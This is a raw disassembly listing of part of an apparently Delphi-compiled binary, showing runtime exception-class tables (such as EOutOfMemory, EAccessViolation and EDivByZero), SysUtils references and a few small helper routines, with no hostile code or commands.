; DATA XREF: .text:off_40006ABC�o
db 2 dup(0)
dd offset off_4000100C
dw 4
db 2 dup(0)
dd offset off_4000100C
dw 8
db 2 dup(0)
dd offset off_4000100C
dw 0Ch
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006AF0 proc near ; CODE XREF: sub_40016A34+69�p
jmp ds:dword_40024634
sub_40006AF0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006AF8 proc near ; CODE XREF: sub_40016AB0+4E�p
jmp ds:dword_40024630
sub_40006AF8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006B00 proc near ; CODE XREF: sub_40016280+2FE�p
; sub_40016958+8E�p
jmp ds:dword_40024628
sub_40006B00 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006B08 proc near ; CODE XREF: sub_40016180+31�p
jmp ds:dword_40024624
sub_40006B08 endp
; ---------------------------------------------------------------------------
align 10h
off_40006B10 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF2C�o
dd 0FFF0h
off_40006B18 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF24�o
dd 0FFF1h
off_40006B20 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF84�o
dd 0FFF2h
off_40006B28 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B084�o
dd 0FFF3h
off_40006B30 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AEC4�o
dd 0FFF4h
off_40006B38 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B034�o
dd 0FFF5h
off_40006B40 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFE8�o
dd 0FFF6h
off_40006B48 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF0C�o
dd 0FFF7h
off_40006B50 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF34�o
dd 0FFF8h
off_40006B58 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B094�o
dd 0FFF9h
off_40006B60 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B08C�o
dd 0FFFAh
off_40006B68 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF88�o
dd 0FFFBh
off_40006B70 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B0A8�o
dd 0FFFCh
off_40006B78 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B0C4�o
dd 0FFFDh
off_40006B80 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFEC�o
dd 0FFFEh
off_40006B88 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B004�o
dd 0FFFFh
off_40006B90 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFFC�o
dd 0FFE0h
off_40006B98 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B0BC�o
dd 0FFE1h
off_40006BA0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B020�o
dd 0FFE2h
off_40006BA8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF74�o
dd 0FFE3h
off_40006BB0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF70�o
dd 0FFE4h
off_40006BB8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF78�o
dd 0FFE5h
off_40006BC0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B088�o
dd 0FFE6h
off_40006BC8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B0B8�o
dd 0FFE7h
off_40006BD0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF28�o
dd 0FFE8h
off_40006BD8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A85C�o
; .data:off_4001AF38�o
dd 0FFE9h
off_40006BE0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A860�o
; .data:off_4001AF8C�o
dd 0FFEAh
off_40006BE8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AEBC�o
; ---------------------------------------------------------------------------
jmp short near ptr loc_40006BEC+1 ; CODE XREF: .text:loc_40006BEC�j
; ---------------------------------------------------------------------------
align 10h
off_40006BF0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B0CC�o
dd 0FFECh
off_40006BF8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B01C�o
dd 0FFEDh
off_40006C00 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF94�o
dd 0FFEEh
off_40006C08 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B050�o
dd 0FFEFh
off_40006C10 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B0C0�o
dd 0FFD0h
off_40006C18 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFD4�o
dd 0FFD1h
off_40006C20 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFB4�o
dd 0FFD2h
off_40006C28 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF98�o
dd 0FFD3h
off_40006C30 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AEC0�o
dd 0FFD4h
off_40006C38 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B014�o
dd 0FFD5h
off_40006C40 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF00�o
dd 0FFD6h
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF44�o
dd 0FFD7h
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B090�o
dd 0FFD8h
off_40006C58 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFF4�o
dd 0FFD9h
off_40006C60 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AEFC�o
dd 0FFDAh
off_40006C68 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AEE0�o
dd 0FFDBh
off_40006C70 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B038�o
dd 0FFDCh
off_40006C78 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFA4�o
dd 0FFDDh
off_40006C80 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B010�o
dd 0FFDEh
off_40006C88 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B06C�o
dd 0FFDFh
off_40006C90 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF40�o
dd 0FFC0h
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B060�o
dd 0FFC1h
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B030�o
; ---------------------------------------------------------------------------
retn 0FFh
; ---------------------------------------------------------------------------
align 4
off_40006CA8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B0A4�o
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0FFh, 2 dup(0)
off_40006CB0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A884�o
; .data:off_4001B0AC�o
dd 0FFC4h
off_40006CB8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A888�o
; .data:off_4001AFD8�o
dd 0FFC5h
off_40006CC0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A88C�o
; .data:off_4001B080�o
dd 0FFC6h
off_40006CC8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A890�o
; .data:off_4001AEB8�o
dd 0FFC7h
off_40006CD0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A894�o
; .data:off_4001AEF4�o
dd 0FFC8h
off_40006CD8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A898�o
; .data:off_4001B0D0�o
dd 0FFC9h
off_40006CE0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A89C�o
; .data:off_4001B068�o
; ---------------------------------------------------------------------------
retf 0FFh
; ---------------------------------------------------------------------------
align 4
off_40006CE8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8A0�o
; .data:off_4001AED8�o
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 0FFh, 2 dup(0)
off_40006CF0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8A4�o
; .data:off_4001AF30�o
db 0CCh
db 0FFh, 2 dup(0)
off_40006CF8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8A8�o
; .data:off_4001AFDC�o
dd 0FFCDh
off_40006D00 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8AC�o
; .data:off_4001B070�o
dd 0FFCEh
off_40006D08 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8B0�o
; .data:off_4001B098�o
dd 0FFCFh
off_40006D10 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8B4�o
; .data:off_4001AF9C�o
dd 0FFB0h
off_40006D18 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8B8�o
; .data:off_4001AEC8�o
dd 0FFB1h
off_40006D20 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8BC�o
; .data:off_4001AF58�o
dd 0FFB2h
off_40006D28 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8C0�o
; .data:off_4001AFBC�o
dd 0FFB3h
off_40006D30 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8C4�o
; .data:off_4001AFF8�o
dd 0FFB4h
off_40006D38 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8C8�o
; .data:off_4001AFB0�o
dd 0FFB5h
off_40006D40 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8CC�o
; .data:off_4001AF48�o
dd 0FFB6h
off_40006D48 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8D0�o
; .data:off_4001AFC4�o
dd 0FFB7h
off_40006D50 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8D4�o
; .data:off_4001B03C�o
dd 0FFB8h
off_40006D58 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8D8�o
; .data:off_4001AECC�o
dd 0FFB9h
off_40006D60 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8DC�o
; .data:off_4001AF50�o
dd 0FFBAh
off_40006D68 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8E0�o
; .data:off_4001AF6C�o
dd 0FFBBh
off_40006D70 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8E4�o
; .data:off_4001B008�o
dd 0FFBCh
off_40006D78 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8E8�o
; .data:off_4001B040�o
dd 0FFBDh
off_40006D80 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8EC�o
; .data:off_4001B04C�o
dd 0FFBEh
off_40006D88 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8F0�o
; .data:off_4001AFE0�o
dd 0FFBFh
off_40006D90 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8F4�o
; .data:off_4001AF14�o
dd 0FFA0h
off_40006D98 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8F8�o
; .data:off_4001B000�o
dd 0FFA1h
off_40006DA0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A8FC�o
; .data:off_4001AF80�o
dd 0FFA2h
off_40006DA8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A900�o
; .data:off_4001AEF0�o
dd 0FFA3h
off_40006DB0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A904�o
; .data:off_4001AF10�o
dd 0FFA4h
off_40006DB8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A908�o
; .data:off_4001AF18�o
dd 0FFA5h
off_40006DC0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A90C�o
; .data:off_4001AED0�o
dd 0FFA6h
off_40006DC8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A910�o
; .data:off_4001B028�o
dd 0FFA7h
off_40006DD0 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A914�o
; .data:off_4001AEE8�o
dd 0FFA8h
off_40006DD8 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001A918�o
; .data:off_4001B078�o
dd 0FFA9h
off_40006DE0 dd offset dword_40006E2C ; DATA XREF: .text:40006E70�o
; .text:40006F28�o ...
dd 2 dup(0)
dd offset dword_40006E2C
dd 4 dup(0)
dd offset word_40006E3E
dd 0Ch
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40006E2C dd 0Eh, 10000h ; .text:40006DEC�o ...
db 2 dup(0)
dd offset off_40001000
dw 4
db 2 dup(0)
word_40006E3E dw 4509h ; DATA XREF: .text:40006E00�o
dd 70656378h, 6E6F6974h
off_40006E48 dd offset dword_40006E94 ; DATA XREF: .text:40006ECC�o
; .text:40007354�o
dd 7 dup(0)
dd offset dword_40006E94
dd 10h
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_4000B204
dd offset sub_40003CD8
dword_40006E94 dd 6548450Eh, 78457061h, 74706563h, 906E6F69h
; DATA XREF: .text:off_40006E48�o
; .text:40006E68�o
off_40006EA4 dd offset dword_40006EF0 ; DATA XREF: sub_4000B72C+8�r
dd 7 dup(0)
dd offset dword_40006EF0
dd 10h
dd offset off_40006E48
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_4000B204
dd offset sub_40003CD8
dword_40006EF0 dd 754F450Ch, 4D664F74h, 726F6D65h, 408D79h ; .text:40006EC4�o
off_40006F00 dd offset dword_40006F4C ; DATA XREF: sub_4000B230+2D�r
; sub_4000B230+4C�r
dd 7 dup(0)
dd offset dword_40006F4C
dd 10h
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40006F4C dd 6E49450Bh, 4574754Fh, 726F7272h ; .text:40006F20�o
off_40006F58 dd offset dword_40006FA4 ; DATA XREF: .text:40006FD8�o
; .text:40007038�o ...
dd 7 dup(0)
dd offset dword_40006FA4
dd 10h
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40006FA4 dd 78454509h, 6E726574h, 0C08B6C61h ; .text:40006F78�o
off_40006FB0 dd offset dword_40006FFC ; DATA XREF: sub_4000B654+80�r
dd 7 dup(0)
dd offset dword_40006FFC
dd 10h
dd offset off_40006F58
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40006FFC dd 78454512h, 6E726574h, 78456C61h, 74706563h, 906E6F69h
; DATA XREF: .text:off_40006FB0�o
; .text:40006FD0�o ...
off_40007010 dd offset dword_4000705C ; DATA XREF: .text:40007090�o
; .text:400070E8�o ...
dd 7 dup(0)
dd offset dword_4000705C
dd 10h
dd offset off_40006F58
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000705C dd 6E494509h, 72724574h, 0C08B726Fh ; .text:40007030�o
dd offset dword_400070B4
dd 7 dup(0)
dd offset dword_400070B4
dd 10h
dd offset off_40007010
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400070B4 dd 6944450Ah, 5A794276h, 906F7265h ; .text:40007088�o ...
off_400070C0 dd offset dword_4000710C ; DATA XREF: sub_4000E068+B�r
dd 7 dup(0)
dd offset dword_4000710C
dd 10h
dd offset off_40007010
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000710C dd 6152450Bh, 4565676Eh, 726F7272h ; .text:400070E0�o ...
dd offset dword_40007164
dd 7 dup(0)
dd offset dword_40007164
dd 10h
dd offset off_40007010
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40007164 dd 6E49450Ch, 65764F74h, 6F6C6672h, 408D77h ; .text:40007138�o ...
off_40007174 dd offset dword_400071C0 ; DATA XREF: .text:400071F4�o
; .text:4000724C�o ...
dd 7 dup(0)
dd offset dword_400071C0
dd 10h
dd offset off_40006F58
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400071C0 dd 614D450Ah, 72456874h, 90726F72h ; .text:40007194�o
dd offset dword_40007218
dd 7 dup(0)
dd offset dword_40007218
dd 10h
dd offset off_40007174
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40007218 dd 6E49450Ah, 696C6176h, 90704F64h ; .text:400071EC�o ...
dd offset dword_40007270
dd 7 dup(0)
dd offset dword_40007270
dd 10h
dd offset off_40007174
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40007270 dd 655A450Bh, 69446F72h, 65646976h ; .text:40007244�o ...
off_4000727C dd offset dword_400072C8 ; DATA XREF: sub_4000E068+30�r
dd 7 dup(0)
dd offset dword_400072C8
dd 10h
dd offset off_40007174
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400072C8 dd 764F4509h, 6C667265h, 0C08B776Fh ; .text:4000729C�o ...
dd offset dword_40007320
dd 7 dup(0)
dd offset dword_40007320
dd 10h
dd offset off_40007174
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40007320 dd 6E55450Ah, 66726564h, 90776F6Ch ; .text:400072F4�o ...
off_4000732C dd offset dword_40007378 ; DATA XREF: sub_4000B72C+1F�r
dd 7 dup(0)
dd offset dword_40007378
dd 10h
dd offset off_40006E48
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_4000B204
dd offset sub_40003CD8
dword_40007378 dd 6E49450Fh, 696C6176h, 696F5064h, 7265746Eh
; DATA XREF: .text:off_4000732C�o
; .text:4000734C�o
dd offset dword_400073D4
dd 7 dup(0)
dd offset dword_400073D4
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400073D4 dd 6E49450Ch, 696C6176h, 73614364h, 408D74h ; .text:400073A8�o ...
off_400073E4 dd offset dword_40007430 ; DATA XREF: sub_40007998+F�r
; sub_4000E068+54�r ...
dd 7 dup(0)
dd offset dword_40007430
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40007430 dd 6F43450Dh, 7265766Eh, 72724574h, 0C08B726Fh
; DATA XREF: .text:off_400073E4�o
; .text:40007404�o
off_40007440 dd offset dword_4000748C ; DATA XREF: sub_4000B488+122�r
; sub_4000B488+17E�r
dd 7 dup(0)
dd offset dword_4000748C
dd 10h
dd offset off_40006F58
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000748C dd 63414510h, 73736563h, 6C6F6956h, 6F697461h, 408D6Eh
; DATA XREF: .text:off_40007440�o
; .text:40007460�o ...
dd offset dword_400074EC
dd 7 dup(0)
dd offset dword_400074EC
dd 10h
dd offset off_40006F58
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400074EC dd 7250450Ah, 6C697669h, 90656765h ; .text:400074C0�o ...
dd offset dword_40007544
dd 7 dup(0)
dd offset dword_40007544
dd 10h
dd offset off_40006F58
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40007544 dd 7453450Eh, 4F6B6361h, 66726576h, 90776F6Ch ; .text:40007518�o ...
dd offset dword_400075A0
dd 7 dup(0)
dd offset dword_400075A0
dd 10h
dd offset off_40006F58
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400075A0 dd 6F434509h, 6F72746Eh, 0C08B436Ch ; .text:40007574�o ...
off_400075AC dd offset dword_400075F8 ; DATA XREF: .text:4000D70C�o
; .text:4000D770�o ...
dd 7 dup(0)
dd offset dword_400075F8
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400075F8 dd 6156450Dh, 6E616972h, 72724574h, 0C08B726Fh
; DATA XREF: .text:off_400075AC�o
; .text:400075CC�o ...
off_40007608 dd offset dword_40007654 ; DATA XREF: sub_4000B300+72�r
dd 7 dup(0)
dd offset dword_40007654
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40007654 dd 73414510h, 74726573h, 466E6F69h, 656C6961h, 408D64h
; DATA XREF: .text:off_40007608�o
; .text:40007628�o ...
off_40007668 dd offset dword_400076B4 ; DATA XREF: sub_4000B3D8+8�r
dd 7 dup(0)
dd offset dword_400076B4
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400076B4 dd 6241450Eh, 61727473h, 72457463h, 90726F72h
; DATA XREF: .text:off_40007668�o
; .text:40007688�o
dd offset dword_40007710
dd 7 dup(0)
dd offset dword_40007710
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40007710 dd 6E49450Eh, 61436674h, 72457473h, 90726F72h ; .text:400076E4�o ...
off_40007720 dd offset dword_4000776C ; DATA XREF: sub_4000C41C+49�r
; sub_4000C41C+5F�r
dd 7 dup(0)
dd offset dword_4000776C
dd 10h
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4000776C dd 534F4508h, 6F727245h, 408D72h ; .text:40007740�o
dd offset dword_400077C4
dd 7 dup(0)
dd offset dword_400077C4
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_400077C4 dd 61534512h, 61636566h, 78456C6Ch, 74706563h, 906E6F69h
; DATA XREF: .text:40007778�o
; .text:40007798�o ...
off_400077D8 dd offset dword_400077DC ; DATA XREF: sub_40007E2C+1A�r
; sub_4000CC50+10D�r
dword_400077DC dd 372E0311h, 434h db 0
dd offset off_40001000
db 48h, 2 dup(0)
db 0
dd offset off_40001000
db 8, 53h, 79h
dd 69745573h, 0C08B736Ch
off_400077FC dd offset dword_40007800 ; DATA XREF: sub_40007E2C+51�r
; sub_4000CC50+11D�r
dword_40007800 dd 382E0311h, 434h db 0
dd offset off_40001000
db 48h, 2 dup(0)
db 0
dd offset off_40001000
db 8, 53h, 79h
dd 69745573h, 0C08B736Ch, 0FFFFFFFFh, 1
dword_40007828 dd 24h off_4000782C dd offset dword_40007878 ; DATA XREF: sub_4000C69C+4B�r
dd 7 dup(0)
dd offset dword_40007878
dd 44h
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_4000C55C
dword_40007878 dd 68545413h, 64616572h, 61636F4Ch, 756F436Ch, 7265746Eh
; DATA XREF: .text:off_4000782C�o
; .text:4000784C�o
dd 0D4C083CCh, 5003E9h, 0D4C08300h, 506BE9h, 0D4C08300h
dd 4EF7E9h, 0D4C08300h, 4F9BE9h, 24448300h, 0BDE9D404h
dd 83FFFFE9h, 0D4042444h, 0FFE9DBE9h, 244483FFh, 0E5E9D404h
dd 0CCFFFFE9h
off_400078CC dd offset dword_40007878+35h ; DATA XREF: .text:400078FC�o
dd offset dword_40007878+3Fh
dd offset dword_40007878+49h
dd offset dword_40007878+15h
dd offset dword_40007878+1Dh
dd offset dword_40007878+25h
dd offset dword_40007878+2Dh
dword_400078E8 dd 1, 7B108C52h, 4CDB1D8Fh, 0E057DF9Ch, 3F3D1971h
; DATA XREF: .text:4000790C�o
dd offset off_400078CC
dd 2Ch, 0
off_40007908 dd offset aTmultireadexcl ; DATA XREF: sub_400191F8+2B�r
; "$TMultiReadExclusiveWriteSynchronizer@"...
dd offset dword_400078E8
dd 6 dup(0)
dd offset aTmultireadexcl ; "$TMultiReadExclusiveWriteSynchronizer@"...
dd 30h
dd offset off_400010E0
dd offset sub_40003EF4
dd offset sub_40006248
dd offset sub_40006254
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40006264
dd offset sub_40003C9C
dd offset sub_4000C710
aTmultireadexcl db '$TMultiReadExclusiveWriteSynchronizer@',0
; DATA XREF: .text:off_40007908�o
; .text:40007928�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000797C proc near ; CODE XREF: sub_40008FB8+2B�p
; sub_40008FB8+3B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, edx
mov edx, eax
shr edx, 10h
div bx
mov ebx, [ebp+arg_0]
mov [ecx], ax
mov [ebx], dx
pop ebx
pop ebp
retn 4
sub_4000797C endp
; =============== S U B R O U T I N E =======================================
sub_40007998 proc near ; CODE XREF: sub_4000828C+4C�p
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
push esi
push edi
mov ecx, ebx
mov dl, 1
mov eax, ds:off_400073E4
call sub_4000B128
call sub_400042E4
pop edi
pop esi
pop ebx
retn
sub_40007998 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400079BC proc near ; CODE XREF: sub_4001145C+87�p
push ebx
push esi
push edi
mov esi, eax
mov eax, edx
test esi, esi
jz loc_40007A4C
mov edx, [esi-4]
mov edi, eax
test edx, edx
jle short loc_40007A4C
mov ecx, [eax]
mov ebx, edx
test ecx, ecx
jz short loc_400079FF
test edx, 3
jnz short loc_400079EE
xor edx, [ecx-4]
cmp edx, 3
jbe short loc_400079F9
jmp short loc_400079FF
; ---------------------------------------------------------------------------
loc_400079EE: ; CODE XREF: sub_400079BC+26�j
or edx, 2
xor edx, [ecx-4]
cmp edx, 1
ja short loc_400079FF
loc_400079F9: ; CODE XREF: sub_400079BC+2E�j
cmp dword ptr [ecx-8], 1
jz short loc_40007A09
loc_400079FF: ; CODE XREF: sub_400079BC+1E�j
; sub_400079BC+30�j ...
mov edx, ebx
or edx, 3
call sub_40004F74
loc_40007A09: ; CODE XREF: sub_400079BC+41�j
mov edi, [edi]
mov [edi-4], ebx
mov byte ptr [edi+ebx], 0
add ebx, 0FFFFFFFFh
and ebx, 0FFFFFFFCh
mov eax, [esi+ebx]
loc_40007A1B: ; CODE XREF: sub_400079BC+8A�j
mov ecx, eax
or eax, 80808080h
mov edx, eax
sub eax, 7B7B7B7Bh
xor edx, ecx
or eax, 80808080h
sub eax, 66666666h
and eax, edx
shr eax, 2
xor eax, ecx
mov [edi+ebx], eax
mov eax, [esi+ebx-4]
sub ebx, 4
jge short loc_40007A1B
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40007A4C: ; CODE XREF: sub_400079BC+9�j
; sub_400079BC+16�j
